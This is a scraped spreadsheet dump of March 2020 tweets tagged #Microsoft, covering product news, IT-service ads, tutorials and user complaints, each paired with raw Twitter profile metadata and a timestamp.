    <t>{'id': 2507457626, 'id_str': '2507457626', 'name': 'Butler Martin', 'screen_name': 'ButlerMartinsnr', 'location': 'Dublin City, Ireland', 'description': 'Martin Butler was born in Dublin, Ireland and is a seasoned Account Executive who is passionate about helping customers find real solutions to their problems.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 141, 'listed_count': 5, 'created_at': 'Mon May 19 13:39:57 +0000 2014', 'favourites_count': 78, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3563,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'http://pbs.twimg.com/profile_images/803640495889125376/aKLKJAyk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/803640495889125376/aKLKJAyk_normal.jpg',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</si>
  <si>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14:18:57 +0000 2020</t>
  </si>
  <si>
    <t>The #microsoft xbox app for PC is total garbage. Notifications are poor, weird account changes for updates are stupid, it never thinks I'm logged in to the xbox game pass because the account doesn't match my windows account. WHAT DOES THAT MATTER? We didn't even get to play Halo</t>
  </si>
  <si>
    <t>{'id': 1069773175, 'id_str': '1069773175', 'name': 'Mostly Sausages', 'screen_name': 'mostly_sausages', 'location': '', 'description': 'Yeeeeeeeeeee', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 79, 'listed_count': 4, 'created_at': 'Tue Jan 08 02:23:01 +0000 2013', 'favourites_count': 260, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5058,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'http://pbs.twimg.com/profile_images/1235020784025899010/QSh-cRL8_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235020784025899010/QSh-cRL8_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1069773175/1468282039',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</si>
  <si>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14:18:51 +0000 2020</t>
  </si>
  <si>
    <t>ConsenSys &amp;amp; EY announced Baseline Protocol a project for enterprises. It has support from 12 other Cos including #Microsoft, AMD, #ChainLink, &amp;amp; MakerDAO
The protocol will allow enterprises to access DeFi services built on the #Ethereum #blockchain w/out publicizing private info</t>
  </si>
  <si>
    <t>{'id': 14797042, 'id_str': '14797042', 'name': 'Cryptoâ‚¿uzz', 'screen_name': 'cryptobuzznews', 'location': 'Santa Monica, CA', 'description': 'A CryptoCurrency &amp; InfoSec News Outlet. See disclaimer.', 'url': 'https://t.co/M9AoBtvsJc', 'entities': {'url': {'urls': [{'url': 'https://t.co/M9AoBtvsJc', 'expanded_url': 'http://www.cryptographybuzz.com', 'display_url': 'cryptographybuzz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17220, 'friends_count': 17135, 'listed_count': 140, 'created_at': 'Fri May 16 09:40:42 +0000 2008', 'favourites_count': 45930, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15896,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'http://pbs.twimg.com/profile_images/934008924591681536/r7fORnqR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/934008924591681536/r7fORnqR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14797042/1515897894',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</si>
  <si>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Thu Mar 05 14:16:08 +0000 2020</t>
  </si>
  <si>
    <t>how to use formulas in #microsoft #excel to calculate total, average, max and more #Office365 #SysAdmin #TechSupport #100DaysOfCode 
https://t.co/Y2md0obIxs https://t.co/seLcqRO2mE</t>
  </si>
  <si>
    <t>{'id': 2508243194, 'id_str': '2508243194', 'name': 'root tech', 'screen_name': 'geoVT25', 'location': 'anywhere in USA', 'description': '#webdeveloper #androiddeveloper #dev #it #consultant #tech', 'url': 'https://t.co/2B8r0RZx9k', 'entities': {'url': {'urls': [{'url': 'https://t.co/2B8r0RZx9k', 'expanded_url': 'https://www.youtube.com/channel/UCOH7oeWBE2pgcFPFmj7lCqw', 'display_url': 'youtube.com/channel/UCOH7oâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 509, 'friends_count': 1802, 'listed_count': 47, 'created_at': 'Mon May 19 19:30:00 +0000 2014', 'favourites_count': 959, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3379,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'http://pbs.twimg.com/profile_images/1099916551392759808/LWtzAMAY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1099916551392759808/LWtzAMAY_normal.jpg',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</si>
  <si>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14:15:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge: Keyboard shortcuts for #Windows10  and  #macOS
To get the most out of the new Microsoft Edge, you should take advantage of keyboard shortcuts.
#keyboard #shortcuts #Chromium #browsers #managedit #managedservicesprovider #PoweredBySTL
https://t.co/uu0zlgw2jo</t>
  </si>
  <si>
    <t>{'id': 459529475, 'id_str': '459529475', 'name': 'PoweredBySTL', 'screen_name': 'PoweredBySTL', 'location': 'Bloomington, Illinois', 'description': 'Delivering managed IT services, cybersecurity, VOIP, and reliable staffing solutions to our clients. Skyâ€™s The Limit when your business is powered by STL!', 'url': 'http://t.co/igVOJAduhJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/igVOJAduhJ', 'expanded_url': 'http://www.poweredbystl.com', 'display_url': 'poweredbystl.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 325, 'friends_count': 581, 'listed_count': 4, 'created_at': 'Mon Jan 09 19:34:28 +0000 2012', 'favourites_count': 1029, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1428,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'http://pbs.twimg.com/profile_images/843835836307140609/v9rySn-I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/843835836307140609/v9rySn-I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/459529475/1490725027', 'profile_link_color': '002855',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</si>
  <si>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14:15:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announced that its bringing its Defender anti-virus software to #Android and iOS. - https://t.co/76mXY2rjKx</t>
  </si>
  <si>
    <t>{'id': 10860602, 'id_str': '10860602', 'name': 'Herb Hernandez', 'screen_name': 'HerbHernandez', 'location': '35.926541,-78.753267', 'description': '#Socialmedia ðŸ“±#Tech ðŸ“· ðŸ’ª#Fitness  /  IG: iamherbh  /  ðŸŽ“: #GoBlue #B1GCats  /  Opinions mine.  / ðŸ’²: #SalesEnablement #Marketing   https://t.co/qK11PEWa24', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/qK11PEWa24', 'expanded_url': 'http://ibm.com/services', 'display_url': 'ibm.com/services', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 1376, 'friends_count': 3067, 'listed_count': 237, 'created_at': 'Wed Dec 05 03:46:48 +0000 2007', 'favourites_count': 1764, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 22596, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '5D7085', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1173608203340451840/GXCdYsSm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173608203340451840/GXCdYsSm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/10860602/1562855197', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '708A87', 'profile_text_color': 'B8CAC0', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 14:15:12 +0000 2020</t>
  </si>
  <si>
    <t>How many of your staff use Microsoft Excel but have never had formal training? - Working smarter is possible with #Microsoft Training https://t.co/P8nljuqzR1</t>
  </si>
  <si>
    <t>{'id': 39969245, 'id_str': '39969245', 'name': 'Jacqueline Offen', 'screen_name': 'jjsystems', 'location': 'Kent &amp; South East of England', 'description': 'Director of leading IT Support Provider - offering simple, professional managed IT solutions for SMEs in Kent &amp; the South East - https://t.co/pLY9lceCt0', 'url': 'https://t.co/qUqcIII7EX', 'entities': {'url': {'urls': [{'url': 'https://t.co/qUqcIII7EX', 'expanded_url': 'http://www.jjsystems.co.uk', 'display_url': 'jjsystems.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/pLY9lceCt0', 'expanded_url': 'http://jjsystems.co.uk', 'display_url': 'jjsystems.co.uk', 'indices': [129, 152]}]}}, 'protected': False, 'followers_count': 1991, 'friends_count': 2572, 'listed_count': 192, 'created_at': 'Thu May 14 10:42:37 +0000 2009', 'favourites_count': 8063, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20302, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFEFA9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/853113467150024705/AgPQsT13_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/853113467150024705/AgPQsT13_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39969245/1495459462',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</si>
  <si>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Thu Mar 05 14:11:26 +0000 2020</t>
  </si>
  <si>
    <t>#brightside of #coronavirus, all tech conferences are live now  #databricks #google #facebook #IBM #microsoft #etc</t>
  </si>
  <si>
    <t>{'id': 2291945443, 'id_str': '2291945443', 'name': 'Marwen Bdiri', 'screen_name': 'BdiriMarwen', 'location': 'Canada', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 432, 'listed_count': 4, 'created_at': 'Wed Jan 15 01:13:21 +0000 2014', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/553558353884880896/YZqVJSGp_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/553558353884880896/YZqVJSGp_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2291945443/1437737563',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</si>
  <si>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14:11:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Releases #PowerShell 7.0 With New Features, Update Alerts https://t.co/4uzyiInil8 by @BleepinComputer</t>
  </si>
  <si>
    <t>{'id': 872812932387753985, 'id_str': '872812932387753985', 'name': 'Access IT Automation', 'screen_name': 'AccessITAutomat', 'location': 'London, England', 'description': 'Intelligent enterprise #ITAutomation to drive #DigitalTransformation', 'url': 'https://t.co/8JY3EavKHU', 'entities': {'url': {'urls': [{'url': 'https://t.co/8JY3EavKHU', 'expanded_url': 'http://www.accessitautomation.com/', 'display_url': 'accessitautomation.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 69, 'friends_count': 146, 'listed_count': 1, 'created_at': 'Thu Jun 08 13:49:53 +0000 2017', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2578,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'http://pbs.twimg.com/profile_images/882661137128591360/f9uc7qcZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/882661137128591360/f9uc7qcZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/872812932387753985/1499277766', 'profile_link_color': '416570',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</si>
  <si>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14:10:39 +0000 2020</t>
  </si>
  <si>
    <t>Designed to help you gain a deeper understanding of #Microsoft #Azure &amp;amp; allowing us to understand your IT landscape &amp;amp; needs, Azure Fundamentals allows us to recommend &amp;amp; advise you, around moving your workload services to the #cloud. Find out more https://t.co/OL31yzMKUl</t>
  </si>
  <si>
    <t>Thu Mar 05 14:10:08 +0000 2020</t>
  </si>
  <si>
    <t>How to Enable #WebApps diagnostic logs #Azure #Microsoft #MSCloud #AzOps #AzurePowerShell #AzureCLI #CloudShell #PowerShell
https://t.co/gQ4YzmoEr0</t>
  </si>
  <si>
    <t>{'id': 386051197, 'id_str': '386051197', 'name': 'Jorge Bernhardt', 'screen_name': 'JorgeBernhardt', 'location': 'Cantabria, EspaÃ±a', 'description': 'Azure Cloud Architect &amp; Windows Server Administrator', 'url': 'https://t.co/vJDZcpZwSM', 'entities': {'url': {'urls': [{'url': 'https://t.co/vJDZcpZwSM', 'expanded_url': 'http://www.jorgebernhardt.com', 'display_url': 'jorgebernhardt.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 43, 'friends_count': 158, 'listed_count': 0, 'created_at': 'Thu Oct 06 15:50:55 +0000 2011', 'favourites_count': 299, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 234,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'http://pbs.twimg.com/profile_images/3434131547/52d2f19b8ebddc1130e52cbfad6c7b98_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3434131547/52d2f19b8ebddc1130e52cbfad6c7b98_normal.jpeg', 'profile_link_color': '3B5BDB',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</si>
  <si>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14:08:15 +0000 2020</t>
  </si>
  <si>
    <t>@0GiS0 is truly inspiring! #SuperTechie #CSA #Microsoft #Developers #Professionals 8M https://t.co/1ZTbxQy1U2</t>
  </si>
  <si>
    <t>{'id': 66948686, 'id_str': '66948686', 'name': 'Victor Estival', 'screen_name': 'victorestival', 'location': 'Madrid', 'description': "I'm a technology enthusiastic, #Azure #Containers #TechnicalMarketing Opinions are my own and not the views of my employer", 'url': 'https://t.co/4EujhX5Win', 'entities': {'url': {'urls': [{'url': 'https://t.co/4EujhX5Win', 'expanded_url': 'http://about.me/victor.estival', 'display_url': 'about.me/victor.estival', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 685, 'friends_count': 1187, 'listed_count': 40, 'created_at': 'Wed Aug 19 08:32:26 +0000 2009', 'favourites_count': 946, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1848,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'http://pbs.twimg.com/profile_images/1745557831/image_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1745557831/image_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/66948686/1510397643', 'profile_link_color': 'CC0000',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</si>
  <si>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14:06:46 +0000 2020</t>
  </si>
  <si>
    <t>Video interop service OneMeeting creates a bridge between any #VideoConferencing system and the #Microsoft cloud. Get more out of your Microsoft investment &amp;amp; start using #MicrosoftTeams for meetings today. Start your 30-day trial | https://t.co/pNsrZWtJEm https://t.co/vCn4xJWIBm</t>
  </si>
  <si>
    <t>{'id': 212661116, 'id_str': '212661116', 'name': 'Modality Systems', 'screen_name': 'modalitysystems', 'location': 'UK, AU, US', 'description': 'Modality Systems is the worldâ€™s largest dedicated Microsoft communications practice, providing communications &amp; collaboration services to over 5 million people.', 'url': 'http://t.co/RC4AbtvtdO', 'entities': {'url': {'urls': [{'url': 'http://t.co/RC4AbtvtdO', 'expanded_url': 'http://www.modalitysystems.com', 'display_url': 'modalitysystems.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3014, 'friends_count': 2412, 'listed_count': 187, 'created_at': 'Sat Nov 06 17:59:55 +0000 2010', 'favourites_count': 3063, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6280,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'http://pbs.twimg.com/profile_images/720909401234739200/wla_dmqd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/720909401234739200/wla_dmqd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/212661116/1526911832', 'profile_link_color': 'ABB8C2',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</si>
  <si>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14:06:15 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14
D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
join @mysterioussu 
@Soniyaskjain1 
@GauravP26479152</t>
  </si>
  <si>
    <t>{'id': 860538705056083970, 'id_str': '860538705056083970', 'name': 'Ruby Agarwal', 'screen_name': 'RubyAga9339', 'location': 'Kolkata, India', 'description': 'Amazon Reviewer â¤Social Media Infuencer ðŸ’•#Contest lover ðŸŒ»Foodie ðŸ¦', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1820, 'friends_count': 2396, 'listed_count': 4, 'created_at': 'Fri May 05 16:56:30 +0000 2017', 'favourites_count': 71000, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 42440, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224564437052358656/8yyxP1QH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224564437052358656/8yyxP1QH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/860538705056083970/1494412690',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</si>
  <si>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14:05:32 +0000 2020</t>
  </si>
  <si>
    <t>Thinking of a full cloud deployment for device management can be daunting with existing CapEx and infrastructure. Get the recommendations for managing a hybrid environment using @MSIntune #msp #hybridcloud #intune #microsoft https://t.co/24TJQ7xfkO</t>
  </si>
  <si>
    <t>{'id': 1005872315538628608, 'id_str': '1005872315538628608', 'name': 'T-Minus 365', 'screen_name': 'tminus365', 'location': 'Colorado, USA', 'description': 'MSP focused KB for Microsoft. Articles and videos to help you drive efficiencies in your company.', 'url': 'https://t.co/bFnE04eQLL', 'entities': {'url': {'urls': [{'url': 'https://t.co/bFnE04eQLL', 'expanded_url': 'https://tminus365.com', 'display_url': 'tminus365.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 198, 'friends_count': 830, 'listed_count': 0, 'created_at': 'Sun Jun 10 18:00:23 +0000 2018', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 130, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1005873695984766976/dtFb7-En_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1005873695984766976/dtFb7-En_normal.jpg',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</si>
  <si>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14:05:19 +0000 2020</t>
  </si>
  <si>
    <t>VIDEO: Deploying #Windows 10 Always On #VPN device tunnel using #Microsoft #Intune. #Windows10 #Win10 #mobility #MSIntune #aovpn https://t.co/Bwk6oMXmr9</t>
  </si>
  <si>
    <t>Thu Mar 05 14:05:17 +0000 2020</t>
  </si>
  <si>
    <t>See how #Workday shares are performing against #Salesforce #Microsoft and #ServiceNow and what can help drive shares up for them in 2020. 
https://t.co/4cm69pKizi</t>
  </si>
  <si>
    <t>{'id': 14756361, 'id_str': '14756361', 'name': 'Corner Office Jobs', 'screen_name': 'corneroffice', 'location': 'St. Petersburg, FL ; Toronto, Canada', 'description': '#WorkdayRecruiter specializing in industry roles - DH &amp; Contract - US &amp; Canada #WDay  Get the #Workday Comp &amp; Mkt Survey Results at https://t.co/0EINI1lumE.', 'url': 'https://t.co/TkJ1MtxGtu', 'entities': {'url': {'urls': [{'url': 'https://t.co/TkJ1MtxGtu', 'expanded_url': 'http://www.CornerOfficeConsultants.com', 'display_url': 'CornerOfficeConsultants.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/0EINI1lumE', 'expanded_url': 'http://bit.ly/COCWday', 'display_url': 'bit.ly/COCWday', 'indices': [132, 155]}]}}, 'protected': False, 'followers_count': 1714, 'friends_count': 342, 'listed_count': 22, 'created_at': 'Tue May 13 08:30:15 +0000 2008', 'favourites_count': 67, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2420, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFD736', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1164254159186608129/uWNriG9s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1164254159186608129/uWNriG9s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14756361/1544030361', 'profile_link_color': '0054B5', 'profile_sidebar_border_color': 'F5EA1B', 'profile_sidebar_fill_color': '8EB2D1', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 14:04:22 +0000 2020</t>
  </si>
  <si>
    <t>Live upcoming Webcast - Situational Response Management and Communications with Microsoft 365 - Webcast https://t.co/e22MbkFQu2 #microsoft #microsoftteams #sharepoint #microsoftstream #powerplatform #yammer</t>
  </si>
  <si>
    <t>Thu Mar 05 14:03:15 +0000 2020</t>
  </si>
  <si>
    <t>1 week to go until our #Microsoft Security Roadshow in Manchester. 
If you haven't already, register now and discover how to secure your identities and get insight on how we can provide the control to liberate your workforce:
https://t.co/EWeHcPCQ6H</t>
  </si>
  <si>
    <t>{'id': 3428378667, 'id_str': '3428378667', 'name': 'ThirdSpace', 'screen_name': 'ThirdSpaceIT', 'location': 'United Kingdom', 'description': 'Identity and Security experts. Microsoft Security and Compliance Partner of the Year 2018. Unleash the power of the digital economy. Securely.', 'url': 'https://t.co/qcNlqnLPFn', 'entities': {'url': {'urls': [{'url': 'https://t.co/qcNlqnLPFn', 'expanded_url': 'https://thirdspace.net', 'display_url': 'thirdspace.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 539, 'friends_count': 316, 'listed_count': 146, 'created_at': 'Mon Aug 17 16:39:03 +0000 2015', 'favourites_count': 906, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4676,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'http://pbs.twimg.com/profile_images/1052115155297939456/HbqLAjiT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052115155297939456/HbqLAjiT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3428378667/1539678805', 'profile_link_color': 'FF542C',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</si>
  <si>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14:02:29 +0000 2020</t>
  </si>
  <si>
    <t>For a long time I wanted to try to perform a striptease, but did not dare, now I'm ready - I'm waiting for you #Athens   #skype #microsoft https://t.co/XGuL69Ih2J</t>
  </si>
  <si>
    <t>{'id': 1235267456823963651, 'id_str': '1235267456823963651', 'name': 'Kristi Cook', 'screen_name': 'drumachetal', 'location': 'Springfield, USA', 'description': 'Women are meant to be loved, not to be understood', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Wed Mar 04 18:14:51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'http://pbs.twimg.com/profile_images/1235292478980476930/AzKhVMz9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235292478980476930/AzKhVMz9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235267456823963651/1583351688',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</si>
  <si>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14:02:22 +0000 2020</t>
  </si>
  <si>
    <t>Directions for implementing the Crisis Communication App as well as download resources. #microsoft #microsoft365 #healthcare #businesscontinuity https://t.co/g5alL7L2f8 #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Mar 05 14:01:53 +0000 2020</t>
  </si>
  <si>
    <t>At #Microsoft their mission and values are to help people and businesses throughout the world realise their full potential. https://t.co/KplhhjOhTu</t>
  </si>
  <si>
    <t>{'id': 35175760, 'id_str': '35175760', 'name': 'Hong Wei', 'screen_name': 'hwsoh', 'location': 'Singapore', 'description': 'Aquarius. Cat lover. Office boy. Shop Consultant. \nðŸ›’ðŸ›ï¸ ðŸ‡ºðŸ‡¸ ðŸ‡¨ðŸ‡¦ ðŸ‡¬ðŸ‡§ ðŸ‡¦ðŸ‡º ðŸ‡¹ðŸ‡¼ ðŸ‡­ðŸ‡° ðŸ‡¸ðŸ‡¬ ðŸ‡²ðŸ‡¾', 'url': 'https://t.co/9lPLzdoR9L', 'entities': {'url': {'urls': [{'url': 'https://t.co/9lPLzdoR9L', 'expanded_url': 'https://sg.shop.com/hwsoh', 'display_url': 'sg.shop.com/hwsoh', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2606, 'friends_count': 1894, 'listed_count': 221, 'created_at': 'Sat Apr 25 08:13:17 +0000 2009', 'favourites_count': 9996, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 144227,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'http://pbs.twimg.com/profile_images/1123528933343764482/pJUiIwyT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123528933343764482/pJUiIwyT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35175760/1562420276', 'profile_link_color': 'E81C4F', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'E3ED87', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 14:00:39 +0000 2020</t>
  </si>
  <si>
    <t>"Data trust, by your employees and by your customers, is more important than ever." - @steigi2000 #SAP #PowerOf3 #Microsoft https://t.co/fKv2cDlc3z</t>
  </si>
  <si>
    <t>Thu Mar 05 14:00:16 +0000 2020</t>
  </si>
  <si>
    <t>#Cisco and #Microsoft are combining their #cloud #IoT offerings, with a #focus on the #industrial sector! 
https://t.co/M6xnVYJNO2 https://t.co/ytDuqWiSBI</t>
  </si>
  <si>
    <t>{'id': 22134219, 'id_str': '22134219', 'name': 'Solutionize Global', 'screen_name': 'SolutionizeG', 'location': 'UK', 'description': 'Tailored technology solutions, outcome-driven consulting and managed services across the public and private sector.', 'url': 'https://t.co/cV8edBTnNe', 'entities': {'url': {'urls': [{'url': 'https://t.co/cV8edBTnNe', 'expanded_url': 'http://www.solutionizeglobal.com', 'display_url': 'solutionizeglobal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1974, 'friends_count': 3876, 'listed_count': 85, 'created_at': 'Fri Feb 27 12:25:46 +0000 2009', 'favourites_count': 1456, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4205,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'http://pbs.twimg.com/profile_images/1175000647952949249/WqJjUN5C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175000647952949249/WqJjUN5C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22134219/1568976960',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</si>
  <si>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14:00:10 +0000 2020</t>
  </si>
  <si>
    <t>Want to win a #MXChip IoT DevKit? Then enter the #Microsoft Cloud Skills Challenge! #Azure #AzureSQL #AzureML https://t.co/AenAOBS3BD</t>
  </si>
  <si>
    <t>Thu Mar 05 14:00:09 +0000 2020</t>
  </si>
  <si>
    <t>Turn your innovative ideas into a brilliant app. #Microsoft #PowerApps #Contest! Learn more and see full contest rules here. #developers #Dynamics #Azure #Office365 https://t.co/cb4Se1TLPm</t>
  </si>
  <si>
    <t>Thu Mar 05 14:00:08 +0000 2020</t>
  </si>
  <si>
    <t>Four practices for #digital #transformation success - #Microsoft #CATALYST @robnehrbas Kellie Piber https://t.co/Ada60MqzVd #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Mar 05 13:59:52 +0000 2020</t>
  </si>
  <si>
    <t>Direction and download for implementing the Crisis communication app - sample template - PowerApps | Microsoft Docs https://t.co/r8rvYoslFR #microsoft #Microsoft365 #sharepoint</t>
  </si>
  <si>
    <t>Thu Mar 05 13:57:28 +0000 2020</t>
  </si>
  <si>
    <t>"Data and insights are needed to win the game!" - @AccentureSA's Christine Tandy. #PowerOf3 #SAP #Microsoft https://t.co/rtNyiHfaKO</t>
  </si>
  <si>
    <t>Thu Mar 05 13:57:10 +0000 2020</t>
  </si>
  <si>
    <t>Businesses have already seen the value of the #cloud. Since 2016 the average cloud budget has spiked by nearly 36%. Now is the right time for #SAP on #Microsoft #Azure! #PowerOf3 https://t.co/xTDkWlOEth</t>
  </si>
  <si>
    <t>Thu Mar 05 13:52:23 +0000 2020</t>
  </si>
  <si>
    <t>Azure Sentinel in Side-by-Site with Splunk https://t.co/AYsMpdBz0E #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 13:50:16 +0000 2020</t>
  </si>
  <si>
    <t>The Power Platform Online Conference 2020 Schedule - #MicrosoftFlow #Microsoft  #InsightRun - https://t.co/8x7yeJYUwM</t>
  </si>
  <si>
    <t>Thu Mar 05 13:50:03 +0000 2020</t>
  </si>
  <si>
    <t>#Windows7 support has ended. What's next? The answer is #Office2010. Find out more about this upcoming change in our blog post https://t.co/CqHQ93g3d0 #Microsoft #OfficeEndOfLife #MicrosoftOffice2010 https://t.co/TlOz7QSVTO</t>
  </si>
  <si>
